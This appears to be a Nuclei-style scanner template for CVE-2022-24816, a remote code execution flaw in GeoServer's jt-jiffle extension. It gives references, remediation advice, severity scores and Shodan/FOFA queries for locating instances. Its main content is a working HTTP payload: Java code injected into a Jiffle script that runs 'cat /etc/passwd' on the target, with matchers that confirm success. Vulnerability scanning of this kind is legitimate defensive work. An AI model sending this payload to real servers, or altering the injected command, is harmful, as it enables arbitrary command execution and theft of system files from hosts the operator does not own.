id: CVE-2022-24816 info: name: GeoServer <1.2.2 - Remote Code Execution author: mukundbhuva severity: critical description: | Programs run on GeoServer before 1.2.2 which use jt-jiffle and allow Jiffle script to be provided via network request are susceptible to remote code execution. The Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects downstream GeoServer 1.1.22. reference: - https://www.synacktiv.com/en/publications/exploiting-cve-2022-24816-a-code-injection-in-the-jt-jiffle-extension-of-geoserver.html - https://github.com/geosolutions-it/jai-ext/security/advisories/GHSA-v92f-jx6p-73rx - https://github.com/geosolutions-it/jai-ext/commit/cb1d6565d38954676b0a366da4f965fef38da1cb - https://nvd.nist.gov/vuln/detail/CVE-2022-24816 remediation: 1.2.22 contains a patch that disables the ability to inject malicious code into the resulting script. Users unable to upgrade may negate the ability to compile Jiffle scripts from the final application by removing janino-x.y.z.jar from the classpath. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-24816 cwe-id: CWE-94 epss-score: 0.85856 cpe: cpe:2.3:a:geosolutionsgroup:jai-ext:*:*:*:*:*:*:*:* metadata: max-request: 1 fofa-query: app="GeoServer" shodan-query: /geoserver/ verified: true vendor: geosolutionsgroup product: jai-ext tags: cve,cve2022,geoserver,rce http: - raw: - | POST /geoserver/wms HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml ras:Jiffle coverage script dest = y() - (500); // */ public class Double { public static double NaN = 0; static { try { java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("cat /etc/passwd").getInputStream())); String line = null; String allLines = " - "; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /** outputType DOUBLE result matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - "ExceptionInInitializerError" condition: and - type: status status: - 200